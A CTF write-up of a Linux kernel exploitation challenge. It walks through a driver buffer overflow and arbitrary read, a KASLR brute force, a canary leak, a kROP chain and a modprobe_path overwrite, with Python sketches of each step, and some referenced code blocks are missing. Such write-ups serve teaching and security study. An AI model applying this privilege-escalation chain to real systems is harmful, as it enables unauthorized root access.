Imaginary CTF 2023 has just ended and it once again did not disappoint. The CTF featured a variety of fun and interesting challenges. Kudos to the organizers for yet another successful event.
One of the interesting challenges that I solved this year was window-of-opportunity, which is a kernelspace pwn challenge. In this writeup, I will share my thought processes and hopefully bring you some insights or new knowledge into the world of kernelspace!
Sometimes, there is a glimmer of hope, a spark of inspiration, a window of opportunity.
We are provided with some files, notably
Conveniently, if we look at src/Makefile
The author provides us a convenient way to compile, run and debug our exploit!
We can simply use the make command to boot the kernel, or make debug to boot the kernel and attach GDB.
Using the decompress.sh script, we can unpack initramfs.cpio to get the file system used by the kernel.
The file that we are interested in is etc/init.d/rcS, which is a shell script that is run on startup.
It might seem a little overwhelming, but I have added some comments to the script to make it easier to understand.
The following lines are some security features that are set by the rcS script.
As you can tell, all three security features are in place to prevent unprivileged users from leaking any sort of information from the kernel.
This forces us to find a way to exploit the possibly vulnerable kernel driver instead of simply reading leaked pointers from the kernel or similar.
Apart from these security features that are enabled at runtime, there are other security features that are enabled when booting the kernel. These can be found in run.sh.
Based on the qemu command, the following protections are enabled:
For ease of debugging our exploits, we can disable some of the restrictions and change our startup shell to be a root shell.
Given that most modern kernel mitigation techniques are enabled, we will need to look for some powerful primitives that can help us work around these protections and still get to root.
We start from init_module, which is a function that is run only once, when the module is loaded.
This function simply registers a character device and maps each kind of interaction with the device to the corresponding handler function via the file_operations struct.
Think of a character device like a McDonald's drive-thru.
Just as the drive-thru is a way for you to interact with McDonald's employees to get your order, the character device is a way for you to interact with the kernel module to do whatever you want it to do.
One way we can interact with the device is by writing to /dev/window, which triggers the device_write function.
If we try to decompile the code in IDA, we get some very weird code here.
Hence we will need to change the call type for some functions and fix up the code a little.
After cleaning up the code, we get something nicer like this:
This function is straightforward. If you haven't noticed, there is no bounds check on the number of bytes copied from userspace into the kernel.
This gives us our first vulnerability, a buffer overflow!
However, as you can also see, there is stack canary protection. This prevents us from trivially smashing the stack and corrupting our instruction pointer. We will have to find a way to leak the stack canary in order for our buffer overflow to be useful.
The device_ioctl function is also pretty straightforward.
Primarily, the function copies a request struct from userspace into the kernel.
It then reads from whatever kernel address the struct asks for and copies that data back to userspace.
Essentially, this function gives us a free arbitrary read, allowing us to read anywhere we want in kernel memory.
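To make the shape of that primitive concrete, here is a minimal Python sketch of how such a request could be packed and how the leaked bytes could be pulled back out. The layout (an 8-byte address followed by a 0x100-byte buffer) and the names pack_request and unpack_leak are assumptions for illustration only; the real struct should be taken from the decompiled module.

```python
import struct

# ASSUMED layout, for illustration only: an 8-byte kernel address followed by
# a fixed-size buffer that the driver fills in. Check the decompilation for
# the real field order and sizes.
ADDR_SIZE = 8
BUF_SIZE = 0x100


def pack_request(kernel_addr, buf_size=BUF_SIZE):
    """Build the bytes handed to the ioctl: target address + empty buffer."""
    return struct.pack("<Q", kernel_addr) + bytes(buf_size)


def unpack_leak(raw):
    """Return the buffer part of a request after the driver has filled it."""
    return raw[ADDR_SIZE:]
```

In a real exploit the packed request would be passed to the ioctl call on /dev/window, and unpack_leak would be applied to the buffer afterwards.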
So far, we have found two very powerful vulnerabilities inside of the kernel module.
With the buffer overflow, we can possibly write a kernel ROP chain to elevate us to root. However, in order to do so, we need to find a way to bypass KASLR so that we are able to find gadgets to use in our ROP chain.
Our arbitrary read requires us to provide an address. If we do not know any kernel address in the first place, how can we use the arbitrary read to defeat KASLR?
Answer: We can use the arbitrary read to brute force KASLR.
In order to understand how and why it works, we need to first understand the following three concepts:
copy_to_user is fail-safe
copy_to_user does not crash the kernel even if the kernel address provided is not mapped yet; it simply copies a bunch of null bytes to the userspace buffer.
It only throws an error and fails when a kernel address is not physically mappable or does not have the appropriate permissions, which is not of concern to us in this writeup.
Unlike in userspace where the ASLR entropy can be as high as 30 bits (1073741824 combinations), the KASLR entropy is only 9 bits (512 combinations) due to space constraints and alignment issues.
We know the range of KASLR addresses to brute force
The physical address and virtual address of kernel text itself are randomized to a different position separately. The physical address of the kernel can be anywhere under 64TB, while the virtual address of the kernel is restricted between [0xffffffff80000000, 0xffffffffc0000000], the 1GB space.
By combining these concepts, we can abuse the arbitrary read via copy_to_user in device_ioctl to brute force the 9 bits of entropy and find our kernel image base.
With all the information, we can write a simple script to brute force the KASLR to get our kernel base.
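As a rough sketch of that brute force: the 1GB window divided into 512 slots gives a 2 MiB step, so we probe each slot until one returns non-zero data. The read callback is a hypothetical wrapper around the ioctl arbitrary read, and the sketch assumes, as described above, that unmapped addresses read back as null bytes.

```python
KERNEL_VA_START = 0xffffffff80000000
KERNEL_VA_END = 0xffffffffc0000000
KASLR_SLOTS = 512  # 9 bits of entropy


def kaslr_candidates():
    """Every possible kernel base: 1 GiB / 512 slots = 2 MiB apart."""
    step = (KERNEL_VA_END - KERNEL_VA_START) // KASLR_SLOTS
    return [KERNEL_VA_START + i * step for i in range(KASLR_SLOTS)]


def find_kernel_base(read, candidates=None):
    """Return the lowest candidate whose memory is not all zeroes.

    read(addr, n) -> bytes is a HYPOTHETICAL wrapper around the ioctl
    arbitrary read; unmapped addresses are assumed to come back as zeroes.
    """
    for addr in candidates or kaslr_candidates():
        if any(read(addr, 16)):
            return addr
    return None
```

Scanning upwards matters here: every slot below the real base is unmapped, so the first slot that returns data is the start of the kernel image.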
Voila!
Now that we have our kernel base, we can easily construct a ROP chain to do whatever we want.
However, we are unable to overflow the return address with our ROP chain without wrecking the kernel stack canary. In order to exploit the buffer overflow, we need to first find a way to leak our stack canary.
Based on the previously decompiled code, canary = __readgsqword(0x28u), we can see that the canary is being loaded from gs:0x28.
We can look at it in our debugger
However, by looking at the address of gs_base, we can see that it is not within the kernel image. If we reboot the kernel a few times, we can also see that the gs_base address is randomized.
This means that we will have to find a way to either
Problem: The kernel image is so huge, how do we find a canary/pointer that we want?
Insight: Since the canary and the pointer to gs_base are both determined at runtime, we want to look for places that store data and are also writable at runtime.
We can look for pointers in the .bss segment, which is a segment within the kernel image that stores global variables that are only initialized at runtime.
By looking at the man page for nm, we can see the following
The /proc/kallsyms file stores all the symbols (functions, variables, etc.) and the corresponding addresses for the kernel. It also follows the same convention as nm. Thus we can easily search for BSS variables by using the following command
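The same filtering can be sketched in Python. In the nm convention, the type letters b and B mark symbols in the BSS section, so we keep only lines whose second column is one of those. The function name bss_symbols is made up for this example, and the input is assumed to be the text of /proc/kallsyms read from the root debugging shell (unprivileged reads show zeroed addresses).

```python
def bss_symbols(kallsyms_text):
    """Return (address, name) pairs for BSS symbols in kallsyms-style text.

    Each line looks like "<hex address> <type> <name> [module]"; types
    "b" and "B" denote BSS symbols, following the nm convention.
    """
    found = []
    for line in kallsyms_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[1] in ("b", "B"):
            found.append((int(parts[0], 16), parts[2]))
    return found
```

The resulting addresses give a range to scan in GDB for interesting runtime pointers.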
By scanning the BSS in memory in GDB, we can soon find an address that is at a fixed relative offset from $gs_base.
As you can see, there is a pointer at a fixed relative offset from $gs_base, stored at an offset of 0x2744050 from our kernel base address.
Based on this finding, we can easily leak our stack canary.
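Put together, the leak is two reads: one at kernel base + 0x2744050 to recover gs_base, and one at gs_base + 0x28 to fetch the canary. The sketch below assumes a hypothetical read(addr, n) wrapper around the ioctl arbitrary read, and takes the distance between the leaked pointer and gs_base as a parameter, since that value has to be measured in GDB and is not stated here.

```python
import struct

PTR_OFFSET = 0x2744050    # offset from kernel base where the pointer lives
CANARY_GS_OFFSET = 0x28   # the canary is loaded from gs:0x28


def leak_canary(read, kernel_base, ptr_to_gs_delta):
    """Return (gs_base, canary) using two arbitrary reads.

    read(addr, n) -> bytes is a HYPOTHETICAL arbitrary-read wrapper.
    ptr_to_gs_delta is the constant distance between the leaked pointer
    and gs_base, as measured in the debugger (ASSUMED to be known).
    """
    leaked = struct.unpack("<Q", read(kernel_base + PTR_OFFSET, 8))[0]
    gs_base = leaked - ptr_to_gs_delta
    canary = struct.unpack("<Q", read(gs_base + CANARY_GS_OFFSET, 8))[0]
    return gs_base, canary
```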
With our canary and kernel base in hand, we are about 60% of the way to completing our exploit.
In kernelspace exploitation challenges, there are usually a few ways to escalate your privileges, some of the more common ones are:
In our case, given that we have a buffer overflow with nothing to stop us, we can take the approach of overwriting modprobe_path by calling copy_from_user.
For the knowledge-hungry and curious minds, you can find more details about it here and here
A short summary of how the technique works: when we execute a file of an unknown format, it will do a series of calls:
Ultimately, if the kernel is unable to identify the format of the binary, it will attempt to call call_usermodehelper_exec, which will execute the modprobe_path string with root privileges.
By corrupting modprobe_path to point to any arbitrary script that we provide, we can execute any commands we want with root privileges.
Ultimately, what we can do is:
1. Create /tmp/xpl.sh with contents #!/bin/sh\nchmod 777 /flag.txt
2. Create /tmp/broken with contents \xff\xff\xff\xff
3. Overwrite modprobe_path with /tmp/xpl.sh
4. Execute /tmp/broken, which triggers modprobe and makes our flag file accessible to every user

Most of the kROP chain is business as usual, just like a userspace ROP chain.
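Before getting into the chain itself, the file staging from the modprobe_path steps above can be sketched in isolation. This is only an illustration: the function name stage_modprobe_files is made up, and the demo at the bottom writes into a temporary directory rather than /tmp so it is harmless to run anywhere.

```python
import os
import tempfile


def stage_modprobe_files(directory="/tmp"):
    """Create the helper script and the unknown-format trigger file."""
    script = os.path.join(directory, "xpl.sh")
    broken = os.path.join(directory, "broken")
    # Script that modprobe_path will point to; it runs as root.
    with open(script, "w") as f:
        f.write("#!/bin/sh\nchmod 777 /flag.txt\n")
    # Four 0xff bytes: no binary format handler recognises this header.
    with open(broken, "wb") as f:
        f.write(b"\xff\xff\xff\xff")
    # Both files must be executable for the trick to fire.
    os.chmod(script, 0o755)
    os.chmod(broken, 0o755)
    return script, broken


# Demo in a throwaway directory; a real exploit would use /tmp.
demo_dir = tempfile.mkdtemp()
script_path, broken_path = stage_modprobe_files(demo_dir)
```

Executing the broken file only has an effect once modprobe_path has been overwritten in kernel memory, which is the job of the ROP chain.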
We first extract the vmlinux binary from the bzImage using this script.
We can then obtain the gadgets using the ROPgadget --binary vmlinux > gadgets.txt command.
The only difference is that in kernelspace, after we finish our chain, we must return to userspace gracefully. The kernel is very fragile and will crash easily if you do not return gracefully.
In order to return to user-mode, swapgs must be called before iretq. The purpose of swapgs is to swap the GS base between its kernel-mode and user-mode values.
Additionally, due to KPTI, we must swap back from the kernel page table to the user-space page table, otherwise we will hit a segmentation fault.
Instead of reinventing the wheel, we can simply use the swapgs_restore_regs_and_return_to_usermode() function to return to userspace gracefully.
Do note that we will also have to save and restore our userspace registers to return to user-mode gracefully.
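As a sketch of how these pieces fit on the stack, the layout below packs filler, the leaked canary, the ROP chain, the trampoline, and finally the frame that iretq pops (RIP, CS, RFLAGS, RSP, SS). The filler length, the number of saved-register slots after the canary, and the two dummy values consumed by the trampoline are all assumptions that depend on the actual function and on the entry offset chosen inside swapgs_restore_regs_and_return_to_usermode; every address used with it is a placeholder.

```python
import struct


def p64(value):
    """Pack a 64-bit little-endian value."""
    return struct.pack("<Q", value)


def build_payload(pad_len, canary, chain, trampoline,
                  user_rip, user_cs, user_rflags, user_rsp, user_ss,
                  saved_slots=1):
    """Lay out an overflow payload ending in a return to user-mode.

    pad_len and saved_slots are ASSUMED values to be read off the
    disassembly; the two dummy qwords after the trampoline assume an
    entry point that still pops two registers before iretq.
    """
    payload = b"A" * pad_len            # filler up to the canary
    payload += p64(canary)              # leaked canary, kept intact
    payload += p64(0) * saved_slots     # saved registers before the return address
    payload += b"".join(p64(g) for g in chain)   # the kROP chain itself
    payload += p64(trampoline)          # swapgs + page-table switch + iretq
    payload += p64(0) * 2               # dummy values popped by the trampoline
    # Frame consumed by iretq, restoring the saved userspace state.
    for reg in (user_rip, user_cs, user_rflags, user_rsp, user_ss):
        payload += p64(reg)
    return payload
```

The userspace values passed in here are the ones saved before triggering the overflow, which is why saving them beforehand is required.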
The final payload is
After the CTF, I was looking through the writeups from other participants and I chanced upon an interesting exploit by nasm (huge kudos to him for his awesome poc). That prompted me to do some research.
reference: mm.txt
extract from linux kernel lore
Seth found that the CPU-entry-area; the piece of per-cpu data that is
mapped into the userspace page-tables for kPTI is not subject to any
randomization – irrespective of kASLR settings.
Surprisingly, for the longest time, the cpu_entry_area mapping in the kernel memory space was not subject to kASLR.
extract from lkml
Without it, these areas are a tasty target for attackers. The entry code and mappings are especially tricky code and this has caused some issues along the way, but they have settled down.
This is a very powerful attack vector, since leaking the kernel base and bypassing kASLR would now be trivial with any single arbitrary read primitive.
Understandably, earlier this year there were a few updates to the linux kernel to randomize cpu_entry_area and close off this easy kASLR bypass.
However, this still left me curious: how long has cpu_entry_area been unaffected by kASLR, considering that it was only patched recently?
The earliest article I found that mentions this dates back to 2017. I found it really interesting that this took 6 years to be noticed and patched. That was some really cool linux kernel lore!
I hope that this writeup was insightful and easy to follow. If there are any queries, feel free to reach out to me on discord via @caprinux. If you are interested in learning more about kernel pwn, you can follow some of the awesome blogs here
Thank you to the ictf team for the amazing CTF and challenges! I hope I win the binja license ^_^
Also, lots of respect for nasm for inspiring the last section of this writeup. You can find his full writeup for the challenge here.